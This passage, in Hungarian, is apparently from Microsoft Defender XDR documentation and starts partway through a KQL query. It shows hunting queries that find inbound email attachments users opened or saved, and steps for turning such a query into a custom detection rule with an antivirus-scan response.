| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"

    Ezzel létrehozott egy lekérdezést, amely azonosítja az összes olyan bejövő e-mailt, amelyben a felhasználó megnyitotta vagy mentette a mellékletet. A lekérdezés finomítását is végezheti, hogy szűrjön adott feladói tartományokra, fájlméretekre, fájltípusokra stb.

  7. A függvények egy speciális illesztési típus, amely lehetővé teszi, hogy több TI-adatot kérjen le egy fájlról, például annak elterjedtségéről, aláírói és kiállítói adatairól stb. A fájl további részleteinek megtekintéséhez használja a FileProfile() függvény bővítési funkcióját:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"
| distinct SHA1
| invoke FileProfile()

Észlelés létrehozása

Miután létrehozott egy olyan lekérdezést, amely azonosítja azokat az információkat, amelyekről riasztást szeretne kapni , ha ezek a jövőben történnek, létrehozhat egy egyéni észlelést a lekérdezésből.

Az egyéni észlelések a beállított gyakoriságnak megfelelően futtatják a lekérdezést, és a lekérdezések eredményei biztonsági riasztásokat hoznak létre a kiválasztott érintett objektumok alapján. Ezek a riasztások az incidensekkel lesznek korrelálva, és az egyik termék által generált egyéb biztonsági riasztásként lesznek osztályozottak.

  1. A lekérdezési lapon távolítsa el a Go veszélyforrás-keresési utasítások 7. lépésében hozzáadott 7. és 8. sorokat, majd kattintson az Észlelési szabály létrehozása elemre.

    Képernyőkép a Speciális veszélyforrás-keresés lap Lekérdezés szerkesztése szakaszáról a Microsoft Defender portálon.

    Megjegyzés:

    Ha az Észlelési szabály létrehozása gombra kattint, és szintaktikai hibák vannak a lekérdezésben, az észlelési szabály nem lesz mentve. Ellenőrizze duplán a lekérdezést, és győződjön meg arról, hogy nincsenek hibák.

  2. Töltse ki a szükséges mezőket azokkal az információkkal, amelyek lehetővé teszik a biztonsági csapat számára a riasztás megértését, a riasztás létrehozásának okát és a várt műveleteket.

    Képernyőkép a Microsoft Defender portál Riasztás részletei lapjáról.

    Győződjön meg arról, hogy a mezőket egyértelmű módon tölti ki, hogy a következő felhasználó tájékozott döntést hozhasson erről az észlelési szabályról

  3. Válassza ki a riasztásban érintett entitásokat. Ebben az esetben válassza az Eszköz és postaláda lehetőséget.

    Képernyőkép az Érintett entitások részletei lapról a Microsoft Defender portálon.

  4. Határozza meg, hogy milyen műveleteket kell végrehajtania, ha a riasztás aktiválódik. Ebben az esetben futtasson víruskereső-vizsgálatot, bár más műveletek is elvégezhetők.

    Képernyőkép a Microsoft Defender portál Műveletek lapjáról.

  5. Válassza ki a riasztási szabály hatókörét. Mivel ez a lekérdezés az eszközöket is érinti, az eszközcsoportok a Végponthoz készült Microsoft Defender környezetének megfelelően relevánsak ebben az egyéni észlelésben. Ha olyan egyéni észlelést hoz létre, amely nem tartalmaz eszközöket érintett entitásként, a hatókör nem lesz érvényes.

    Képernyőkép a Hatókör lapról a Microsoft Defender portálon.

    Ebben a próbaüzemben érdemes lehet ezt a szabályt az éles környezetben lévő tesztelési eszközök egy részhalmazára korlátozni.

  6. Válassza a Létrehozás lehetőséget. Ezután válassza az Egyéni észlelési szabályok lehetőséget a navigációs panelen.

    Képernyőkép az Egyéni észlelési szabályok szabályai lehetőségről a Microsoft Defender portálon.

    Képernyőkép az észlelési szabályokról és a végrehajtás részleteiről a Microsoft Defender portálon.

    Ezen a lapon kiválaszthatja az észlelési szabályt, amely megnyitja a részleteket tartalmazó oldalt.

    Képernyőkép az oldalról, amelyen az aktivált riasztások részletei láthatók a Microsoft Defender portálon.

Speciális veszélyforrás-kereséssel kapcsolatos szakértői képzés

A támadó nyomon követése egy webcast-sorozat új biztonsági elemzők és tapasztalt veszélyforrás-vadászok számára. Végigvezeti a speciális veszélyforrás-keresés alapjaion egészen a saját kifinomult lekérdezések létrehozásához.

A kezdéshez tekintse meg a speciális veszélyforrás-kereséssel kapcsolatos szakértői képzések beolvasását ismertető cikket.

További lépés

A Vizsgálat és válasz a Microsoft Defender XDR-sel című cikkből származó információkat beépítheti a SecOps-folyamatokba.